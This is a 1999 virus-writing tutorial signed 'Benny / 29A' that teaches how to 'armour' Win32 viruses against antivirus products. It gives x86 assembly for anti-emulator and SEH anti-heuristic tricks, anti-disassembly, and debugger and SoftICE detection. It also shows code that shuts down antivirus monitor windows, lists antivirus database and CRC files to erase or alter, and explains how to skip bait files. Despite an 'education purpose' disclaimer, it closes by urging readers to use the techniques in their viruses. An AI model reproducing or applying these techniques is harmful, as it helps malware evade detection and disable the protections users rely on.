Disclamer
The followin' document is an education purpose only. Author isn't
responsible for any misuse of the things written in this document.
Foreword
Every good virus should be armoured. Armoured means have some features, by
which will be harder to detect, harder to emulate, harder to disassemble,
harder to trace, harder to monitor or harder to understand. I will discuss
here all techniques, which has some special meaning in virus programming.
Introduction
Actually, there r many ways, how to protect virus against AVs and Averz under
so weird interface as Win32 is.
Something is often used, something isn't. Here is a "short" list of techniques,
which I will describe:
Anti-Emulator - fool AVs by some tricks
By heuristic analysis, AVs SHOULD be find every virus, even unknown one. It
worx like coder, which debugging some program. Heuristic scanner passes thru
the code and looking for some suspicious code. It may be procedure for
searching APIs, procedure to jump to ring-0, working with wildcards of
executable files, opening executable file for write etc...
Heuristic analysis is very good idea, nevertheless, not very well realised.
AVs have many bugs and "sometimes", they can't recognize viral code.
Some heuristic scanners have problems with undocumented opcodes, another
scanners can't work with selectors and almost every scanner can't handle stack
properly. Here r the techniques, which r used by many viruses and which still
seems to be problem for heuristic scanners:
mov eax, ds ;load DS
push eax ;some
pop ds ;stuff
mov ebx, ds ;load DS again
cmp eax, ebx ;compare selectors
jne emul_present ;if not same, quit
or mov edx, esp ;load ESP
push cs ;some
pop eax ;stuff
cmp esp, edx ;compare stack pointer
jne emul_present ;quit if not equal
push cs ;store CS
push offset label ;store address of procedure
retf ;and go there
db 0D6h ;SALC
db 0F1h ;BPICE
Anti-Heuristics - fool AVs by advanced technologies
Anti-Emulator uses holes in heuristic scanners. But at Anti-Heuristic case,
we uses more advanced technology to fool AVs. If AVerz were able to "patch"
holes in AVs, here it won't be so easy. They will need to rebuild their
emulator and add new features (e.g. support of SEH).
In DOS-viruses beginnings, viruses tried to hook Int 0 (divide by zero) and
then divided register by zero. This caused, that execution was redirected
to another place. AVerz had to rebuild their heuristic analysis to support
hooking of interrupt vectors. This is perfect example of anti-heuristic
technology. Next good example is poly-layered polymorphic decryptor.
Time didn't chang so much and we use similar techniques to cause AVs to
support newer and newer techs. Here r some examples:
@SEH_SetupFrame <seh_proc> ;setup SEH handler to seh_proc
xchg [edx], eax ;cause GP fault
... ;garbage code
seh_proc:
@SEH_RemoveFrame ;remove SEH handler
... ;code continue here
Some coderz call this technique as anti-emulator and previous as anti-heuristic. I don't know, which expresion is right (nobody knows :D) and I don't care. I think, that previous stuff was clear...
Anti-Analysis - fool disassemblers by some tricks
Good virus should use some tricks, by which some curious ppl (such as AVers)
won't be able to analyse it much easy. Really, there ain't anything easier
for AVer than open IDA or Sourcer and see whole code as it was original
source. Static analysis is very frequently used to analyse virus, don't forget
it.
Those tricks r still same and some of them r also used as Anti-Debugging
technique.
call label
gdelta: db 0b8h ;MOV opcode
label: pop ebp ;get delta offset
... ;next code
mov eax, [ebp + variable - gdelta] ;example of handling EBP
jmp opcd+1 ;jump into instruction
opcd: mov eax, 0fcebfa90h ;NOP, CLI, infinite loop
proc1: movzx ecx, word ptr [edi+4] ;some code
ret ;quit from procedure
db 0b8h ;prefix (MOV EAX, ...)
proc2: mov eax, [edi+3ch] ;some code
ret ;quit from procedure
call label
patch: ... ;some garbage code
jmp shit ;...
... ;normal code
label: mov [patch], 90909090h ;overwrite garbage with NOPs
ret ;and quit from procedure
Anti-Debug - harder to analyse
In previous examples we tried to fool machines - emulators and disassemblers.
But now, we will try to fool AVerz, and that's very hard. AVerz aren't dumb
(mmm, ofcoz there r some exceptions :D), so it is very important to make
analysis of your virus harder. As much as possible.
If virus cannot be analysed by disassembler, AVerz uses debuggers. Debuggers
r easily detectable (Win32 interface allows it to us), but their detection
mechanism shouldn't be very visible (AVerz can simply jump over the code).
call IsDebuggerPresent ;call API
xchg eax, ecx ;result to ECX
jecxz debugger_not_present ;if ZERO, debugger not present
mov ecx, fs:[20h] ;load context of debugger
jecxz debugger_not_present ;if ZERO, debugger not present
mov eax, 202h ;SoftICE ID number
VxDCall Get_DDB ;call service
xchg eax, ecx ;result to ECX
jecxz sice_not_present ;SoftICE not present
xor eax, eax ;EAX=0
push eax ;parameters
push 4000000h ;for
push eax ;CreateFileA
push eax ;API
push eax ;function
push eax ;...
push offset sice ;name of driver
call CreateFileA ;open driver
inc eax ;is EAX==0?
je sice_not_present ;yeah, SoftICE is not present
dec eax ;no,
push eax ;close its handle
call CloseHandle ;...
... ;and make some action
sice db '\\.\SICE',0 ;SICE driver under Win9X
;sice db '\\.\NTICE',0 ;SICE driver under WinNT
mov eax, '****' ;set already_infected mark
mov dr0, eax ;to dr0
Anti-Monitor - killing watch-dogs
Resident shields (monitors) r resident programs used to catch viruses.
Monitors r activated, when executable files (usually) r opened, closed,
executed, etc... Virus can be cought by monitor not only when infected file
is being executing, but also when file is being copying. This on-line virus
security is very efficent and many stupid users have installed some monitor.
That's a problem. If monitor is installed as standard Win32 application in
memory, it won't be big problem to get rid of that. Bad stuff is that this
code doesn't work on AVs, which use special driver (VxD, WDM, ...) to control
file access.
Firstly we have to find window, which will we close. We will use FindWindowA API:
wAVP db 'AVP Monitor',0 ;window title
...
mov eax, offset wAVP ;window title
push eax ;push parameter
cdq ;EDX=0
push edx ;window class - NULL
call FindWindowA ;find window
xchg eax, ecx ;swap EAX with ECX
jecxz quit ;if ECX=0, quit
If AVP monitor window exists, we have window handle in EAX register. Otherwise, EAX is NULL. We will use that handle to send close message:
push edx ;NULL parameter
push edx ;NULL parameter
push 12h ;WM_QUIT message
push ecx ;window handle
call PostMessageA ;send message!
Geee, and AVP monitor is away! I also tested it with NODICE and it also worked. U can close another monitors, if u know titles of their windows.
Anti-Antivirus - destroy your enemy!
If u wanna be sure, that stupid user won't find your virus, then correct
that "problem" on AV side - erase or modify AV crc files and AV databases.
Here r the most important files, which should be erased (mm, but don't forget
that after u delete viral database, AV won't run) or in better case - only
modified (e.g. delete virus from database):
*.AVC -
AVP viral databaseAVP.CRC -
AVP crc file*.VDB -
DrWeb viral databaseNOD32.000 -
NODICE viral databaseANTI-VIR.DAT -
TBAV crc fileCHKLIST.MS -
MSAV crc file
Anti-Bait - don't infect AV files
Baits r mostly silly do-nothing programs and the only one purpose of their
existency is to be infected by virus. That program can be easily analysed,
easier than winword.exe, for example. And becoz we wanna make job to AVs as
hard as possible, we r tryin' to not infect those shitty programs. Baits r
usualy named as 00000000.EXE, 00000001.EXE, 00000002.EXE, etc. The first
advice is don't infect files with digits in its name. But take care! Many
normal programs has digits in its name, such as winrar95.exe or wincmd32.exe.
So, if u don't wanna infect baits, but wanna infect standard applications,
check, if filename contains digits at all 4, 6 or 8 positions. How easy...X-D
Closin'
I hope this article will help u with coding under Win32 and u will find it
useful. If u didn't understand everything, then read it again or cotact
your netwerk supervisor :)).
Don't forget to use some techniques from this article to be sure your virus
will be better than average.
Benny / 29A, 1999